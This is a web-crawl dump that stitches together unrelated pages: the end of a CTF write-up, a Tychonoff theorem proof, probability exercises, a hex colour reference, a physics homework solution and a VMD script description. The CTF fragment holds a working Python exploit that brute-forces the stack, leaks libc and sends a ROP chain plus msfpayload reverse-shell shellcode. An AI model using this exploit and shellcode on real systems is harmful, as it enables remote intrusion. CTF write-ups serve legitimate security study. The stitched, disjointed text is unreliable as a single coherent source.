pop_4)\np += \"FDNO\" # int fd\np += pack(\"<I\", area) # void *buf\np += pack(\"<I\", len(SC)) # size_t n\np += pack(\"<I\", 0) # int flags\n\np += pack(\"<I\", area)\n\ns = connect()\ns.send((\"a=new Socket();a.send(a.fileno);a.recv(\"+str(len(p))+\");//\").ljust(1024,\"X\"))\nfileno = unpack(\"<I\", s.recv(4))\np = p.replace(\"FDNO\", pack(\"<I\",fileno))\ns.send(p)\ns.send(SC)\ns.close()\nprint \"Done. 
Have shell?\"\n\n# Shellcode to use\n# msfpayload linux/x86/shell_reverse_tcp LHOST=\"127.0.0.1\" LPORT=\"1337\" R |hexdump -ve '\"\\\\\\x\" 1/1 \"%02x\"'; echo;\nSC = \"\\x31\\xdb\\xf7\\xe3\\x53\\x43\\x53\\x6a\\x02\\x89\\xe1\\xb0\\x66\\xcd\\x80\\x5b\\x5e\\x68\\x7f\\x00\\x00\\x01\\x66\\x68\\x05\\x39\\x66\\x53\\x6a\\x10\\x51\\x50\\x89\\xe1\\x43\\x6a\\x66\\x58\\xcd\\x80\\x59\\x87\\xd9\\xb0\\x3f\\xcd\\x80\\x49\\x79\\xf9\\x50\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x50\\x53\\x89\\xe1\\xb0\\x0b\\xcd\\x80\"\n\nsebp, seip, context = bf_stack()\nlibc = get_libc_ba()\nprint \"Remote libc at 0x%08x\" % libc\nexploit(SC)```\nThis exploitation also bypasses ASLR, but takes more time because of the brute-force. Anyway I like it because we don't have to make any assumption about remote libraries thanks to the arbitrary memory leak using send(). If remote libraries are unknown, we can find where they are from the GOT then dump and analyze them.\n\nThank you ShmooCon and Ghost in the Shellcode for this cool challenge!\n\n1.", null, "2.", null, "" ]
[ null, "https://resources.blogblog.com/img/blank.gif", null, "https://www.blogger.com/img/blogger_logo_round_35.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.66798866,"math_prob":0.902296,"size":16236,"snap":"2022-27-2022-33","text_gpt3_token_len":5176,"char_repetition_ratio":0.115389355,"word_repetition_ratio":0.11464968,"special_character_ratio":0.35772356,"punctuation_ratio":0.14986038,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.96190274,"pos_list":[0,1,2,3,4],"im_url_duplicate_count":[null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-06-27T20:49:19Z\",\"WARC-Record-ID\":\"<urn:uuid:b1711cae-593e-4f94-906c-00631ef5b20c>\",\"Content-Length\":\"164946\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:212c44c9-b772-421b-9980-2e7663ca4bc1>\",\"WARC-Concurrent-To\":\"<urn:uuid:fb16569c-fd2a-4de6-aec1-6929d6e17685>\",\"WARC-IP-Address\":\"142.250.65.83\",\"WARC-Target-URI\":\"https://blog.stalkr.net/2011/01/shmoocon-ctf-warmup-contest-javascrimpd.html?showComment=1294978990935\",\"WARC-Payload-Digest\":\"sha1:LLXZEOOPCC2PTYSO3FCFXUHTGUH4ASYV\",\"WARC-Block-Digest\":\"sha1:7UCHRI2S3UP6WOBUGCO5JZYCJPMDOFUI\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-27/CC-MAIN-2022-27_segments_1656103341778.23_warc_CC-MAIN-20220627195131-20220627225131-00329.warc.gz\"}"}
http://mathonline.wikidot.com/tychonoff-s-theorem-for-arbitrary-products-of-compact-sets
[ "Tychonoff's Theorem for Arbitrary Products of Compact Sets\n\nTychonoff's Theorem for Arbitrary Products of Compact Sets\n\nRecall from the Alexander's Subbasis Theorem page that if $(X, \\tau)$ is a topological space and $\\mathcal S$ is a subbasis of the topology $\\tau$ on $X$ then if every open cover consisting only of subbasis elements has a finite subcover, then $X$ is a compact space.\n\nWe will use this great result to prove the famous Tychonoff's theorem.\n\n Theorem 1 (Tychonoff's Theorem): Let $\\{ X_i \\}_{i \\in I}$ be an arbitrary collection of topological spaces. Then $X_i$ is compact for all $i \\in I$ if and only if the topological product $\\displaystyle{\\prod_{i \\in I} X_i}$ is compact.\n• Proof: $\\Rightarrow$ Suppose that $X_i$ is compact for all $i \\in I$ and consider the product $\\displaystyle{\\prod_{i \\in I} X_i}$. Recall from the Arbitrary Topological Products of Topological Spaces page that a subbasis for this topological product is given by:\n(1)\n\\begin{align} \\quad \\mathcal S = \\left \\{ p_i^{-1}(U) : U \\: \\mathrm{is \\: open \\: in \\:} X_i \\mathrm{\\: for \\: some \\:} i \\in I \\right \\} \\end{align}\n• We claim that any cover of $X$ consisting only of subbasis elements has a finite subcover. Let $\\mathcal F$ be a cover of $X$ consisting only of subbasis elements.\n• For each $i \\in I$ let $\\mathcal U_i$ be the set of all $U$ for which $p_i^{-1}(U) \\in \\mathcal F$, i.e.,:\n(2)\n\\begin{align} \\quad \\mathcal U_i = \\{ U : p_i^{-1}(U) \\in \\mathcal F \\} \\end{align}\n• We claim that there exists an $i \\in I$ such that $\\mathcal U_i$ covers $X_i$. Suppose not, i.e., suppose that for all $i \\in I$ we have that $\\mathcal U_i$ does not cover $X_i$, i.e., $\\displaystyle{X_i \\not \\subseteq \\bigcup_{U \\in \\mathcal U_i} U}$. Then there exists an $x_i \\in X_i$ that is not covered by $\\mathcal U_i$, so $\\displaystyle{x_i \\not \\in \\bigcup_{U \\in \\mathcal U_i} U}$.\n• Let $(x_i)_{i \\in I}$ be the point in $\\displaystyle{\\prod_{i \\in I} X_i}$ constructed from taking coordinates as described above. Then $(x_i)_{i \\in I} \\not \\in p_i^{-1}(U) \\in \\mathcal F$. But this is a contradiction since $\\mathcal F$ is supposed to be a cover of $\\displaystyle{\\prod_{i \\in I} X_i}$. So the assumption that there does not exist an $i \\in I$ such that $\\mathcal U_i$ covers $X_i$ is false.\n• So there exists an $i \\in I$ such that $\\mathcal U_{i}$ covers $X_{i}$. Each space in the product is compact, so $X_{i}$ is compact, so there exists a finite subcover, $U_1, U_2, ..., U_n$ of $\\mathcal U_i$ that also covers $X_i$. But then the following set is a finite subcover of $\\displaystyle{\\prod_{i \\in I} X_i}$:\n(3)\n\\begin{align} \\quad \\{ p_i^{-1}(U_1), p_i^{-1}(U_2), ..., p_i^{-1}(U_n) \\} \\end{align}\n• Moreover, since $U_1, U_2, ..., U_n \\in \\mathcal U_i$, this means that $p_i^{-1}(U_1), p_i^{-1}(U_2), ..., p_i^{-1}(U_n) \\in \\mathcal F$. So every open cover consisting only of elements from the subbasis $\\mathcal S$ has a finite subcover.\n• By Alexander's subbasis theorem, this implies that $\\displaystyle{\\prod_{i \\in I} X_i}$ is a compact space. $\\blacksquare$" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.788448,"math_prob":0.99992454,"size":3072,"snap":"2019-43-2019-47","text_gpt3_token_len":986,"char_repetition_ratio":0.15026076,"word_repetition_ratio":0.11485148,"special_character_ratio":0.33398438,"punctuation_ratio":0.12765957,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":1.0000055,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-10-16T11:36:56Z\",\"WARC-Record-ID\":\"<urn:uuid:de802af4-ae76-4871-86f0-142d7cff3d61>\",\"Content-Length\":\"18855\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:10e88937-1d2e-45ca-baaf-4278d1cc9ea1>\",\"WARC-Concurrent-To\":\"<urn:uuid:fb01e710-4790-42e6-8af4-c0f4b4416061>\",\"WARC-IP-Address\":\"107.20.139.176\",\"WARC-Target-URI\":\"http://mathonline.wikidot.com/tychonoff-s-theorem-for-arbitrary-products-of-compact-sets\",\"WARC-Payload-Digest\":\"sha1:PQID4EYWXJJ2Z7XGZ6RL3TZZCPERFK7G\",\"WARC-Block-Digest\":\"sha1:TTXLGGFFB4D2ON6U4544KV4XWAZYHR5V\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-43/CC-MAIN-2019-43_segments_1570986668569.22_warc_CC-MAIN-20191016113040-20191016140540-00222.warc.gz\"}"}
https://www.hackmath.net/en/example/7573?tag_id=21
[ "# Perfect cubes\n\nSuppose a number is chosen at random from the set (0,1,2,3,. .. ,202).\nWhat is the probability that the number is a perfect cube?\n\nResult\n\np =  2.475 %\n\n#### Solution:", null, "Leave us a comment of example and its solution (i.e. if it is still somewhat unclear...):", null, "Be the first to comment!", null, "#### To solve this example are needed these knowledge from mathematics:\n\nWould you like to compute count of combinations?\n\n## Next similar examples:\n\n1. Word", null, "What is the probability that a random word composed of chars T, H, A, M will be MATH?\n2. Cards", null, "From a set of 32 cards we randomly pull out three cards. What is the probability that it will be seven king and ace?\n3. Boys and girls", null, "There are eight boys and nine girls in the class. There were six children on the trip from this class. What is the probability that left a) only boys b) just two boys\n4. Three-digit numbers", null, "How many three-digit numbers are from the numbers 0 2 4 6 8 (with/without repetition)?\n5. Salami", null, "How many ways can we choose 5 pcs of salami, if we have 6 types of salami for 10 pieces and one type for 4 pieces?\n6. Boys and girls", null, "There are 11 boys and 18 girls in the classroom. Three pupils will answer. What is the probability that two boys will be among them?\n7. Sum or product", null, "What is the probability that two dice fall will have the sum 7 or product 12?\n8. Raffle", null, "There are 200 draws in the raffle, but only 20 of them win. What is the probability of at least 4 winnings for a group of people who have bought 5 tickets together?\n9. Combinations of sweaters", null, "I have 4 sweaters two are white, 1 red and 1 green. How many ways can this done?\n10. Families 2", null, "There are 729 families having 6 children each. The probability of a girl is 1/3 and the probability of a boy is 2/3. Find the the number of families having 2 girls and 4 boys.\n11. A pizza", null, "A pizza place offers 14 different toppings. How many different three topping pizzas can you order?\n12. Word MATEMATIKA", null, "How many words can be created from the word MATEMATIKA by changing the order of the letters, regardless of whether or not the words are meaningful?\n13. Flags", null, "How many different flags can be made from colors white, red, green, purple, orange, yellow, blue so that each flag consisted of three different colors?\n14. Hockey players", null, "After we cycle five hockey players sit down. What is the probability that the two best scorers of this crew will sit next to each other?\n15. Dices throws", null, "What is the probability that the two throws of the dice: a) Six falls even once b) Six will fall at least once\n16. 7 heroes", null, "9 heroes galloping on 9 horses behind. How many ways can sort them behind?\n17. Vans", null, "In how many ways can 9 shuttle vans line up at the airport?" ]
[ null, "https://www.hackmath.net/tex/e7573/57c978dabc.png", null, "https://www.hackmath.net/hashover/images/first-comment.png", null, "https://www.hackmath.net/hashover/images/avatar.png", null, "https://www.hackmath.net/static/t/t_278.jpg", null, "https://www.hackmath.net/static/t/t_4827.jpg", null, "https://www.hackmath.net/static/t/t_7064.jpg", null, "https://www.hackmath.net/static/t/t_1816.jpg", null, "https://www.hackmath.net/static/t/t_4737.jpg", null, "https://www.hackmath.net/static/t/t_7924.jpg", null, "https://www.hackmath.net/static/t/t_5232.jpg", null, "https://www.hackmath.net/static/t/t_5953.jpg", null, "https://www.hackmath.net/static/t/t_2618.jpg", null, "https://www.hackmath.net/static/t/t_7457.jpg", null, "https://www.hackmath.net/static/t/t_7936.jpg", null, "https://www.hackmath.net/static/t/t_5434.jpg", null, "https://www.hackmath.net/static/t/t_208.jpg", null, "https://www.hackmath.net/static/t/t_1320.jpg", null, "https://www.hackmath.net/static/t/t_2560.jpg", null, "https://www.hackmath.net/static/t/t_435.jpg", null, "https://www.hackmath.net/static/t/t_724.jpg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9344803,"math_prob":0.9365584,"size":2660,"snap":"2019-13-2019-22","text_gpt3_token_len":667,"char_repetition_ratio":0.15737952,"word_repetition_ratio":0.06508876,"special_character_ratio":0.24736843,"punctuation_ratio":0.10992908,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9776603,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40],"im_url_duplicate_count":[null,2,null,null,null,null,null,4,null,5,null,2,null,2,null,1,null,null,null,2,null,2,null,1,null,2,null,9,null,1,null,2,null,2,null,4,null,2,null,2,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-03-21T08:09:56Z\",\"WARC-Record-ID\":\"<urn:uuid:98f579f8-3494-42cb-959c-9d87cb92432c>\",\"Content-Length\":\"17072\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:52fba069-1f87-484d-8144-657dc6976f02>\",\"WARC-Concurrent-To\":\"<urn:uuid:11eed10a-87ba-4603-89ba-eeef80d20002>\",\"WARC-IP-Address\":\"104.24.105.91\",\"WARC-Target-URI\":\"https://www.hackmath.net/en/example/7573?tag_id=21\",\"WARC-Payload-Digest\":\"sha1:5PJ4KWIUHFAQSWFHMXN4ABXEFROZKKFK\",\"WARC-Block-Digest\":\"sha1:6IOAMRDTG3HR4C2P3SDTIZZQXR7N3AN5\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-13/CC-MAIN-2019-13_segments_1552912202506.45_warc_CC-MAIN-20190321072128-20190321094128-00514.warc.gz\"}"}
https://www.colorhexa.com/00703f
[ "# #00703f Color Information\n\nIn a RGB color space, hex #00703f is composed of 0% red, 43.9% green and 24.7% blue. Whereas in a CMYK color space, it is composed of 100% cyan, 0% magenta, 43.8% yellow and 56.1% black. It has a hue angle of 153.8 degrees, a saturation of 100% and a lightness of 22%. #00703f color hex could be obtained by blending #00e07e with #000000. Closest websafe color is: #006633.\n\n• R 0\n• G 44\n• B 25\nRGB color chart\n• C 100\n• M 0\n• Y 44\n• K 56\nCMYK color chart\n\n#00703f color description : Very dark cyan - lime green.\n\n# #00703f Color Conversion\n\nThe hexadecimal color #00703f has RGB values of R:0, G:112, B:63 and CMYK values of C:1, M:0, Y:0.44, K:0.56. Its decimal value is 28735.\n\nHex triplet RGB Decimal 00703f `#00703f` 0, 112, 63 `rgb(0,112,63)` 0, 43.9, 24.7 `rgb(0%,43.9%,24.7%)` 100, 0, 44, 56 153.8°, 100, 22 `hsl(153.8,100%,22%)` 153.8°, 100, 43.9 006633 `#006633`\nCIE-LAB 41.131, -39.803, 19.717 6.691, 11.946, 6.656 0.265, 0.472, 11.946 41.131, 44.419, 153.647 41.131, -36.268, 28.855 34.564, -25.932, 12.778 00000000, 01110000, 00111111\n\n# Color Schemes with #00703f\n\n• #00703f\n``#00703f` `rgb(0,112,63)``\n• #700031\n``#700031` `rgb(112,0,49)``\nComplementary Color\n• #007007\n``#007007` `rgb(0,112,7)``\n• #00703f\n``#00703f` `rgb(0,112,63)``\n• #006970\n``#006970` `rgb(0,105,112)``\nAnalogous Color\n• #700700\n``#700700` `rgb(112,7,0)``\n• #00703f\n``#00703f` `rgb(0,112,63)``\n• #700069\n``#700069` `rgb(112,0,105)``\nSplit Complementary Color\n• #703f00\n``#703f00` `rgb(112,63,0)``\n• #00703f\n``#00703f` `rgb(0,112,63)``\n• #3f0070\n``#3f0070` `rgb(63,0,112)``\n• #317000\n``#317000` `rgb(49,112,0)``\n• #00703f\n``#00703f` `rgb(0,112,63)``\n• #3f0070\n``#3f0070` `rgb(63,0,112)``\n• #700031\n``#700031` `rgb(112,0,49)``\n• #002414\n``#002414` `rgb(0,36,20)``\n• #003d22\n``#003d22` `rgb(0,61,34)``\n• #005731\n``#005731` `rgb(0,87,49)``\n• #00703f\n``#00703f` `rgb(0,112,63)``\n• #008a4d\n``#008a4d` `rgb(0,138,77)``\n• #00a35c\n``#00a35c` `rgb(0,163,92)``\n• #00bd6a\n``#00bd6a` `rgb(0,189,106)``\nMonochromatic Color\n\n# Alternatives to #00703f\n\nBelow, you can see some colors close to #00703f. Having a set of related colors can be useful if you need an inspirational alternative to your original color choice.\n\n• #007023\n``#007023` `rgb(0,112,35)``\n• #00702c\n``#00702c` `rgb(0,112,44)``\n• #007036\n``#007036` `rgb(0,112,54)``\n• #00703f\n``#00703f` `rgb(0,112,63)``\n• #007048\n``#007048` `rgb(0,112,72)``\n• #007052\n``#007052` `rgb(0,112,82)``\n• #00705b\n``#00705b` `rgb(0,112,91)``\nSimilar Colors\n\n# #00703f Preview\n\nThis text has a font color of #00703f.\n\n``<span style=\"color:#00703f;\">Text here</span>``\n#00703f background color\n\nThis paragraph has a background color of #00703f.\n\n``<p style=\"background-color:#00703f;\">Content here</p>``\n#00703f border color\n\nThis element has a border color of #00703f.\n\n``<div style=\"border:1px solid #00703f;\">Content here</div>``\nCSS codes\n``.text {color:#00703f;}``\n``.background {background-color:#00703f;}``\n``.border {border:1px solid #00703f;}``\n\n# Shades and Tints of #00703f\n\nA shade is achieved by adding black to any pure hue, while a tint is created by mixing white to any pure color. 
In this example, #000e08 is the darkest color, while #f9fffd is the lightest one.\n\n• #000e08\n``#000e08` `rgb(0,14,8)``\n• #002213\n``#002213` `rgb(0,34,19)``\n• #00351e\n``#00351e` `rgb(0,53,30)``\n• #004929\n``#004929` `rgb(0,73,41)``\n• #005c34\n``#005c34` `rgb(0,92,52)``\n• #00703f\n``#00703f` `rgb(0,112,63)``\n• #00844a\n``#00844a` `rgb(0,132,74)``\n• #009755\n``#009755` `rgb(0,151,85)``\n• #00ab60\n``#00ab60` `rgb(0,171,96)``\n• #00be6b\n``#00be6b` `rgb(0,190,107)``\n• #00d276\n``#00d276` `rgb(0,210,118)``\n• #00e681\n``#00e681` `rgb(0,230,129)``\n• #00f98c\n``#00f98c` `rgb(0,249,140)``\n• #0eff96\n``#0eff96` `rgb(14,255,150)``\n• #22ff9e\n``#22ff9e` `rgb(34,255,158)``\n• #35ffa7\n``#35ffa7` `rgb(53,255,167)``\n• #49ffaf\n``#49ffaf` `rgb(73,255,175)``\n• #5cffb8\n``#5cffb8` `rgb(92,255,184)``\n• #70ffc0\n``#70ffc0` `rgb(112,255,192)``\n• #84ffc9\n``#84ffc9` `rgb(132,255,201)``\n• #97ffd2\n``#97ffd2` `rgb(151,255,210)``\n• #abffda\n``#abffda` `rgb(171,255,218)``\n• #beffe3\n``#beffe3` `rgb(190,255,227)``\n• #d2ffeb\n``#d2ffeb` `rgb(210,255,235)``\n• #e6fff4\n``#e6fff4` `rgb(230,255,244)``\n• #f9fffd\n``#f9fffd` `rgb(249,255,253)``\nTint Color Variation\n\n# Tones of #00703f\n\nA tone is produced by adding gray to any pure hue. In this case, #343c39 is the less saturated color, while #00703f is the most saturated one.\n\n• #343c39\n``#343c39` `rgb(52,60,57)``\n• #2f4139\n``#2f4139` `rgb(47,65,57)``\n• #2b453a\n``#2b453a` `rgb(43,69,58)``\n• #27493a\n``#27493a` `rgb(39,73,58)``\n• #224e3b\n``#224e3b` `rgb(34,78,59)``\n• #1e523b\n``#1e523b` `rgb(30,82,59)``\n• #1a563c\n``#1a563c` `rgb(26,86,60)``\n• #165a3c\n``#165a3c` `rgb(22,90,60)``\n• #115f3d\n``#115f3d` `rgb(17,95,61)``\n• #0d633d\n``#0d633d` `rgb(13,99,61)``\n• #09673e\n``#09673e` `rgb(9,103,62)``\n• #046c3e\n``#046c3e` `rgb(4,108,62)``\n• #00703f\n``#00703f` `rgb(0,112,63)``\nTone Color Variation\n\n# Color Blindness Simulator\n\nBelow, you can see how #00703f is perceived by people affected by a color vision deficiency. This can be useful if you need to ensure your color combinations are accessible to color-blind users.\n\nMonochromacy\n• Achromatopsia 0.005% of the population\n• Atypical Achromatopsia 0.001% of the population\nDichromacy\n• Protanopia 1% of men\n• Deuteranopia 1% of men\n• Tritanopia 0.001% of the population\nTrichromacy\n• Protanomaly 1% of men, 0.01% of women\n• Deuteranomaly 6% of men, 0.4% of women\n• Tritanomaly 0.01% of the population" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.5060716,"math_prob":0.85746646,"size":3661,"snap":"2023-14-2023-23","text_gpt3_token_len":1624,"char_repetition_ratio":0.13781789,"word_repetition_ratio":0.007352941,"special_character_ratio":0.5583174,"punctuation_ratio":0.23015873,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9939393,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-05-31T22:59:17Z\",\"WARC-Record-ID\":\"<urn:uuid:32ada7b2-b6cc-4b94-9e0a-31117a61c6cf>\",\"Content-Length\":\"36092\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:af637845-6189-4495-ac9c-f03399baf99e>\",\"WARC-Concurrent-To\":\"<urn:uuid:ab93cb70-ffc5-481e-a148-b143cb61505b>\",\"WARC-IP-Address\":\"178.32.117.56\",\"WARC-Target-URI\":\"https://www.colorhexa.com/00703f\",\"WARC-Payload-Digest\":\"sha1:AHNQWM4RVZ5AITWFYUFNN2BFLZGXYHA4\",\"WARC-Block-Digest\":\"sha1:PKSNQPZZGWS25Q7OAOBTNOHF5LAZPPX5\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-23/CC-MAIN-2023-23_segments_1685224647459.8_warc_CC-MAIN-20230531214247-20230601004247-00006.warc.gz\"}"}
https://studysoup.com/tsg/20266/university-physics-13-edition-chapter-15-problem-47e
[ "×\nGet Full Access to University Physics - 13 Edition - Chapter 15 - Problem 47e\nGet Full Access to University Physics - 13 Edition - Chapter 15 - Problem 47e\n\n×\n\n# The portion of the string of a certain musical instrument", null, "ISBN: 9780321675460 31\n\n## Solution for problem 47E Chapter 15\n\nUniversity Physics | 13th Edition\n\n• Textbook Solutions\n• 2901 Step-by-step solutions solved by professors and subject experts\n• Get 24/7 help from StudySoup virtual teaching assistants", null, "University Physics | 13th Edition\n\n4 5 1 241 Reviews\n13\n2\nProblem 47E\n\nThe portion of the string of a certain musical instrument between the bridge and upper end of the finger board (that part of the string that is free to vibrate) is 60.0 cm long, and this length of the string has mass 2.00 g. The string sounds an A4 note (440 Hz) when played. (a) Where must the player put a finger (what distance x from the bridge) to play a D 5 note (587 Hz)? (See ?Fig. E15.45?.) For both the A4 and D5 notes, the string vibrates in its fundamental mode. (b) Without retuning, is it possible to play a G4 note (392 Hz) on this string? Why or why not?\n\nStep-by-Step Solution:\n\nSolution 47E Introduction The length of the string to produce the A4 note is given, we have to calculate the required length to produce the D5 note. Step 1 Let us consider that the speed of the wave in the string is v . Now the frequency of A4 node is f = 440 Hz and the frequency of the D5 note is f = 587 Hz. 1 2 Now let us consider that the wavelength of the A4 and D5 notes are and1 . Henc2 the speed is given by v = f 1 1 f 2 2.(1) Now, the length of the string for L =160 cm and the length of the string for D5 note is L . We2 also know that, for the fundamental note, the wavelength is given by 1 2L a1d = 22 2 Hence from the equation (1) we can write that 2L f = 2L f 1 1L f 2(440 Hz)(60 cm) L 2 f 1= (587 Hz) 45.0 Hz 2 So the player must put the finger at 45.0 cm away.\n\nStep 2 of 2\n\n##### ISBN: 9780321675460\n\nSince the solution to 47E from 15 chapter was answered, more than 814 students have viewed the full step-by-step answer. This textbook survival guide was created for the textbook: University Physics, edition: 13. University Physics was written by and is associated to the ISBN: 9780321675460. The answer to “The portion of the string of a certain musical instrument between the bridge and upper end of the finger board (that part of the string that is free to vibrate) is 60.0 cm long, and this length of the string has mass 2.00 g. The string sounds an A4 note (440 Hz) when played. (a) Where must the player put a finger (what distance x from the bridge) to play a D 5 note (587 Hz)? (See ?Fig. E15.45?.) For both the A4 and D5 notes, the string vibrates in its fundamental mode. (b) Without retuning, is it possible to play a G4 note (392 Hz) on this string? Why or why not?” is broken down into a number of easy to follow steps, and 113 words. The full step-by-step solution to problem: 47E from chapter: 15 was answered by , our top Physics solution expert on 05/06/17, 06:07PM. This full solution covers the following key subjects: string, Note, Play, bridge, finger. This expansive textbook survival guide covers 26 chapters, and 2929 solutions.\n\nUnlock Textbook Solution" ]
[ null, "https://studysoup.com/cdn/85cover_2610067", null, "https://studysoup.com/cdn/85cover_2610067", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.906634,"math_prob":0.842757,"size":1348,"snap":"2021-43-2021-49","text_gpt3_token_len":404,"char_repetition_ratio":0.1748512,"word_repetition_ratio":0.013840831,"special_character_ratio":0.32344213,"punctuation_ratio":0.09006211,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9738568,"pos_list":[0,1,2,3,4],"im_url_duplicate_count":[null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-11-29T23:31:51Z\",\"WARC-Record-ID\":\"<urn:uuid:915498d3-9025-4fcf-a669-c3b2253a6595>\",\"Content-Length\":\"85332\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:a8998c08-ceba-4cf8-a6bd-c83a6af11f3e>\",\"WARC-Concurrent-To\":\"<urn:uuid:90f3b9ec-445e-4759-978b-1a73d49d7040>\",\"WARC-IP-Address\":\"54.189.254.180\",\"WARC-Target-URI\":\"https://studysoup.com/tsg/20266/university-physics-13-edition-chapter-15-problem-47e\",\"WARC-Payload-Digest\":\"sha1:LQAXSVNE6W5A6XLI7PTIOJP5L3IELZXF\",\"WARC-Block-Digest\":\"sha1:EI75UCEJJQ6SLTCGSJZJP3KHQKEXBVDR\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-49/CC-MAIN-2021-49_segments_1637964358847.80_warc_CC-MAIN-20211129225145-20211130015145-00334.warc.gz\"}"}
https://www.ks.uiuc.edu/Research/vmd/script_library/scripts/ca-dist-v2.0/
[ "```CA Distance Plot 2.0\n--------------------\n\nREQUIREMENTS: VMD Version 1.5 or newer\n\nDESCRIPTION:\nGiven a selection, this script finds the CA atoms and constructs a\nmatrix whose elements are the distances from the CA of residue(i) to\nthat on residue(j). A new graphics molecule is created with the name\n\"CA_distance(molid)\", where molid is the index of the molecule used\nby the selection. The distance matrix is plotted by residue number\nin the order they appeared in the PDB (or PSF, ...) file, but only\nthe selected residues are shown. The colors are determined by the\ncolor scale and may be changed accordingly.\n\nHOW IT WORKS:\nThis example creates a distance matrix made of the distance\nbetween the CAs of two residues. The only input value is selection\nused to find the CAs. The distances are stored in the 2D array\n`dist', which is indexed by the atom indices of the CAs (remember,\natom indices start at 0).\n\nThe distance matrix is a new graphics molecule. It consists\nof two triangles for each element of the matrix (to make up a square).\nThe color for each pair is one of the 32 elements in the color scale\nand is determined so the range of distance values fits linearly\nbetween 34 and 66 (excluding 66 itself). The name of the graphics is\n`CA_distance(n)' where `n' is the molecule id of the selection\nused to create the matrix.\n\nThe first graphics command, ``materials off'' is to keep the\nlights from reflecting off the matrix (otherwise there is too much\nglare). At the end, the corners of the matrix are labeled in yellow\nwith the resid values of the CAs.\n\nOne extra procedure, ``vecdist'', is used. This computes\nthe difference between two vectors of length 3. It is not as general\nas the normal method (vecnorm [vecsub \\$v1 \\$v2]) but is almost\ntwice as fast, which speeds up the overall subroutine by almost 10%.\nThe script is not very fast; after all, for a 234 residue protein,\n27495 distance calculations are made and 54756*2 triangles generated.\nNearly all of that is done in Tcl. In terms of times, about 1/3 is\nspent in the distance calculations, another 1/3 in the math to make\nthe triangles, and another 1/3 in the three `graphics' calls. The\nresidue 234 example protein took 70 seconds to do everything on an\nSGI Crimson.\n\nPROCEDURES:\nca_dist selection -- makes a new graphics molecule which is\nthe CA-CA distance plot of the given selection\n\nEXAMPLE OUTPUT:", null, "image of bacteriorhodopsin with the CA-CA on the bottom" ]
[ null, "https://www.ks.uiuc.edu/Research/vmd/script_library/scripts/ca-dist-v2.0/br.dist.small.gif", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9249944,"math_prob":0.9798168,"size":2508,"snap":"2019-26-2019-30","text_gpt3_token_len":576,"char_repetition_ratio":0.15335463,"word_repetition_ratio":0.0,"special_character_ratio":0.2400319,"punctuation_ratio":0.10080645,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.97631675,"pos_list":[0,1,2],"im_url_duplicate_count":[null,2,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-07-22T18:19:17Z\",\"WARC-Record-ID\":\"<urn:uuid:5004d5a6-2f66-4e46-91d8-a6362ec95f56>\",\"Content-Length\":\"3243\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:3fcf8dec-6ff2-4cb2-8ebd-51e93362ee47>\",\"WARC-Concurrent-To\":\"<urn:uuid:60fbde0f-b2e9-4577-ba4f-1dd014a93ee1>\",\"WARC-IP-Address\":\"130.126.120.35\",\"WARC-Target-URI\":\"https://www.ks.uiuc.edu/Research/vmd/script_library/scripts/ca-dist-v2.0/\",\"WARC-Payload-Digest\":\"sha1:C22OJAUDLROU5ALZ2P7EHTCUA4GZUMK2\",\"WARC-Block-Digest\":\"sha1:TRHIS62NOIZITI6ZGEHAUYYBJX2LXUA4\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-30/CC-MAIN-2019-30_segments_1563195528208.76_warc_CC-MAIN-20190722180254-20190722202254-00426.warc.gz\"}"}
https://gitlab.common-lisp.net/gpalter/ansi-test/commit/2f8353ca0fd1b428cc32758854ebfe65fca26d47
